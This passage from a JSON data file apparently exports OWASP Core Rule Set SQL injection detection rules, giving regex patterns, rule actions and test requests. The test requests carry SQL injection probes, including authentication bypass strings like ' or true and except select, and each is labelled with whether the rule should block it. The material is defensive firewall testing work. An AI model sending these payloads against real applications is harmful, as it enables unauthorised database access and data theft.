}, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:\\([\\s\\x0b]*?select[\\s\\x0b]*?[0-9A-Z_a-z]+|coalesce|order[\\s\\x0b]+by[\\s\\x0b]+if[0-9A-Z_a-z]*?)[\\s\\x0b]*?\\(|\\*/from|\\+[\\s\\x0b]*?[0-9]+[\\s\\x0b]*?\\+[\\s\\x0b]*?@|[0-9A-Z_a-z][\\\"'`][\\s\\x0b]*?(?:(?:[\\+\\-=@\\|]+[\\s\\x0b]+?)+|[\\+\\-=@\\|]+)[\\(0-9]|@@[0-9A-Z_a-z]+[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z]|[^0-9A-Z_a-z]!+[\\\"'`][0-9A-Z_a-z]|[\\\"'`](?:;[\\s\\x0b]*?(?:if|while|begin)|[\\s\\x0b0-9]+=[\\s\\x0b]*?[0-9])|[\\s\\x0b\\(]+case[0-9]*?[^0-9A-Z_a-z].+[tw]hen[\\s\\x0b\\(]", "actions": [ { "act_name": "id", "lineno": 942, "act_quote": "no_quote", "act_arg": "942310", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 943, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 944, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 945, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 946, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 946, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 947, "act_quote": "quotes", "act_arg": "Detects chained SQL injection attempts 2/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 948, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 949, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 950, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 951, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 952, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 953, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 954, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 955, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 956, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 957, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 958, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 959, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 960, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 941 } }, { "rule_id": "942330", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\\"'`][\\s\\x0b]*?\\b(?:x?or|div|like|between|and)\\b[\\s\\x0b]*?[\\\"'`]?[0-9]|\\x5cx(?:2[37]|3d)|^(?:.?[\\\"'`]$|[\\\"'\\x5c`]*?(?:[\\\"'0-9`]+|[^\\\"'`]+[\\\"'`])[\\s\\x0b]*?\\b(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\\|\\||&&)\\b[\\s\\x0b]*?[\\\"'0-9A-Z_-z][!&\\(\\)\\+-\\.@])|[^\\s\\x0b0-9A-Z_a-z][0-9A-Z_a-z]+[\\s\\x0b]*?[\\-\\|][\\s\\x0b]*?[\\\"'`][\\s\\x0b]*?[0-9A-Z_a-z]|@(?:[0-9A-Z_a-z]+[\\s\\x0b]+(?:and|x?or|div|like|between)\\b[\\s\\x0b]*?[\\\"'0-9`]+|[\\-0-9A-Z_a-z]+[\\s\\x0b](?:and|x?or|div|like|between)\\b[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z])|[^\\s\\x0b0-:A-Z_a-z][\\s\\x0b]*?[0-9][^0-9A-Z_a-z]+[^\\s\\x0b0-9A-Z_a-z][\\s\\x0b]*?[\\\"'`].|[^0-9A-Z_a-z]information_schema|table_name[^0-9A-Z_a-z]", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects classic SQL injection probings 1/3", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "classic SQL injection probings 1/3", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=%22%27&var2=whatever" }, "expected": { "should_block": true, "rule_ids": [ 942330 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=%22%27&var2=whatever" } ] }, { "description": "Test first backslash match ([\"'`\\]*?)", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\\"1 or 1-" }, "expected": { "should_block": true, "rule_ids": [ 942330 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\\"1 or 1-" } ] }, { "description": "Test second backslash match (\\x5cx(?:23|27|3d))", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=\\x23" }, "expected": { "should_block": true, "rule_ids": [ 942330 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=\\x23" } ] }, { "description": "Test false positive issue nr. 3205", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "\"var=05111222333\nandy.surname@somedomain.com\"\n" }, "expected": { "should_block": false, "rule_ids": [ 942330 ] }, "malicious_patterns": [ { "location": "post_body", "value": "\"var=05111222333\nandy.surname@somedomain.com\"\n" } ] }, { "description": "Test false positive issue nr. 3205", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "var=05111222333 andy.surname@somedomain.com" }, "expected": { "should_block": false, "rule_ids": [ 942330 ] }, "malicious_patterns": [ { "location": "post_body", "value": "var=05111222333 andy.surname@somedomain.com" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 975, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)[\\\"'`][\\s\\x0b]*?\\b(?:x?or|div|like|between|and)\\b[\\s\\x0b]*?[\\\"'`]?[0-9]|\\x5cx(?:2[37]|3d)|^(?:.?[\\\"'`]$|[\\\"'\\x5c`]*?(?:[\\\"'0-9`]+|[^\\\"'`]+[\\\"'`])[\\s\\x0b]*?\\b(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|\\|\\||&&)\\b[\\s\\x0b]*?[\\\"'0-9A-Z_-z][!&\\(\\)\\+-\\.@])|[^\\s\\x0b0-9A-Z_a-z][0-9A-Z_a-z]+[\\s\\x0b]*?[\\-\\|][\\s\\x0b]*?[\\\"'`][\\s\\x0b]*?[0-9A-Z_a-z]|@(?:[0-9A-Z_a-z]+[\\s\\x0b]+(?:and|x?or|div|like|between)\\b[\\s\\x0b]*?[\\\"'0-9`]+|[\\-0-9A-Z_a-z]+[\\s\\x0b](?:and|x?or|div|like|between)\\b[\\s\\x0b]*?[^\\s\\x0b0-9A-Z_a-z])|[^\\s\\x0b0-:A-Z_a-z][\\s\\x0b]*?[0-9][^0-9A-Z_a-z]+[^\\s\\x0b0-9A-Z_a-z][\\s\\x0b]*?[\\\"'`].|[^0-9A-Z_a-z]information_schema|table_name[^0-9A-Z_a-z]", "actions": [ { "act_name": "id", "lineno": 976, "act_quote": "no_quote", "act_arg": "942330", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 977, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 978, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 979, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 980, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 980, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 981, "act_quote": "quotes", "act_arg": "Detects classic SQL injection probings 1/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 982, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 983, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 984, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 985, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 986, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 987, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 988, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 989, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 990, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 991, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 992, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 993, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 994, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 975 } }, { "rule_id": "942340", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)in[\\s\\x0b]*?\\(+[\\s\\x0b]*?select|(?:(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between)[\\s\\x0b]+|(?:\\|\\||&&)[\\s\\x0b]*?)[\\s\\x0b\\+0-9A-Z_a-z]+(?:regexp[\\s\\x0b]*?\\(|sounds[\\s\\x0b]+like[\\s\\x0b]*?[\\\"'`]|[0-9=]+x)|[\\\"'`](?:[\\s\\x0b]*?(?:(?:[0-9]+[\\s\\x0b]*?(?:--|#)|is[\\s\\x0b]*?(?:[0-9][^\\\"'`]+[\\\"'`]?[0-9A-Z_a-z]|[\\.0-9]+[\\s\\x0b]*?[^0-9A-Z_a-z][^\\\"'`]*[\\\"'`])|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between)[\\s\\x0b]+|(?:\\|\\||&&)[\\s\\x0b]*?)(?:array[\\s\\x0b]*?\\[|(?:tru|fals)e\\b|[0-9A-Z_a-z]+(?:[\\s\\x0b]*?!?~|[\\s\\x0b]+(?:not[\\s\\x0b]+)?similar[\\s\\x0b]+to[\\s\\x0b]+))|[%&<->\\^]+[0-9]+[\\s\\x0b]*?(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between)=)|(?:[^0-9A-Z_a-z]+[\\+\\-0-9A-Z_a-z]+[\\s\\x0b]*?=[\\s\\x0b]*?[0-9][^0-9A-Z_a-z]+|\\|?[\\-0-9A-Z_a-z]{3,}[^\\s\\x0b,\\.0-9A-Z_a-z]+)[\\\"'`])|\\bexcept[\\s\\x0b]+(?:select\\b|values[\\s\\x0b]*?\\()", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL authentication bypass attempts 3/3", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "basic SQL authentication bypass attempts 3/3", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=in%20%28%20select%20%2a%20from", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=in%20%28%20select%20%2a%20from" } ] }, { "description": "SQLite authentication bypass with except select", "test_id": 2, "request": { "method": "GET", "uri": "/get?var=except%20%09select.1%2C2", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=except%20%09select.1%2C2" } ] }, { "description": "SQLite authentication bypass with except values", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=except%20values(1%2C2)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=except%20values(1%2C2)" } ] }, { "description": "true-negative except selecting", "test_id": 4, "request": { "method": "GET", "uri": "/get?var=except%20selecting", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=except%20selecting" } ] }, { "description": "basic SQL authentication bypass attempts 3/3", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=x'%20or%20array[id]%20is%20not%20null--" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=x'%20or%20array[id]%20is%20not%20null--" } ] }, { "description": "basic SQL authentication bypass attempts 3/3", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email=x'%20or%20email~all(array[email]);analyze--" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email=x'%20or%20email~all(array[email]);analyze--" } ] }, { "description": "basic SQL authentication bypass attempts 3/3", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email='%20and%20email%20not%20similar%20to%20id--" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email='%20and%20email%20not%20similar%20to%20id--" } ] }, { "description": "basic SQL authentication bypass attempts 3/3", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email='%20or%20true;%20foo" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email='%20or%20true;%20foo" } ] }, { "description": "basic SQL authentication bypass attempts 3/3", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email='%20or%20false;%20foo" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email='%20or%20false;%20foo" } ] }, { "description": "basic SQL authentication bypass attempts 3/3 (no whitespace between operator)", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email='||true" }, "expected": { "should_block": true, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email='||true" } ] }, { "description": "SQL Auth Bypass FP test (invalid operator without whitespace)", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "email='ortrue" }, "expected": { "should_block": false, "rule_ids": [ 942340 ] }, "malicious_patterns": [ { "location": "post_body", "value": "email='ortrue" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 1004, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)in[\\s\\x0b]*?\\(+[\\s\\x0b]*?select|(?:(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between)[\\s\\x0b]+|(?:\\|\\||&&)[\\s\\x0b]*?)[\\s\\x0b\\+0-9A-Z_a-z]+(?:regexp[\\s\\x0b]*?\\(|sounds[\\s\\x0b]+like[\\s\\x0b]*?[\\\"'`]|[0-9=]+x)|[\\\"'`](?:[\\s\\x0b]*?(?:(?:[0-9]+[\\s\\x0b]*?(?:--|#)|is[\\s\\x0b]*?(?:[0-9][^\\\"'`]+[\\\"'`]?[0-9A-Z_a-z]|[\\.0-9]+[\\s\\x0b]*?[^0-9A-Z_a-z][^\\\"'`]*[\\\"'`])|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between)[\\s\\x0b]+|(?:\\|\\||&&)[\\s\\x0b]*?)(?:array[\\s\\x0b]*?\\[|(?:tru|fals)e\\b|[0-9A-Z_a-z]+(?:[\\s\\x0b]*?!?~|[\\s\\x0b]+(?:not[\\s\\x0b]+)?similar[\\s\\x0b]+to[\\s\\x0b]+))|[%&<->\\^]+[0-9]+[\\s\\x0b]*?(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between)=)|(?:[^0-9A-Z_a-z]+[\\+\\-0-9A-Z_a-z]+[\\s\\x0b]*?=[\\s\\x0b]*?[0-9][^0-9A-Z_a-z]+|\\|?[\\-0-9A-Z_a-z]{3,}[^\\s\\x0b,\\.0-9A-Z_a-z]+)[\\\"'`])|\\bexcept[\\s\\x0b]+(?:select\\b|values[\\s\\x0b]*?\\()", "actions": [ { "act_name": "id", "lineno": 1005, "act_quote": "no_quote", "act_arg": "942340", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 1006, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 1007, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 1008, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1009, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 1009, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 1010, "act_quote": "quotes", "act_arg": "Detects basic SQL authentication bypass attempts 3/3", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 1011, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1012, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1013, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1014, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1015, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1016, "act_quote": "quotes", "act_arg": "paranoia-level/2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1017, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1018, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1019, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1020, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1021, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1022, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1023, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1004 } }, { "rule_id": "942361", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i:^[\\W\\d]+\\s*?(?:alter|union)\\b)", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects basic SQL injection based on keyword alter or union", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "'alter a" }, "expected": { "should_block": true, "rule_ids": [ 942361 ] }, "malicious_patterns": [ { "location": "post_body", "value": "'alter a" } ] }, { "description": "Detects basic SQL injection based on keyword alter or union", "test_id": 2, "request": { "method": "POST", "uri": 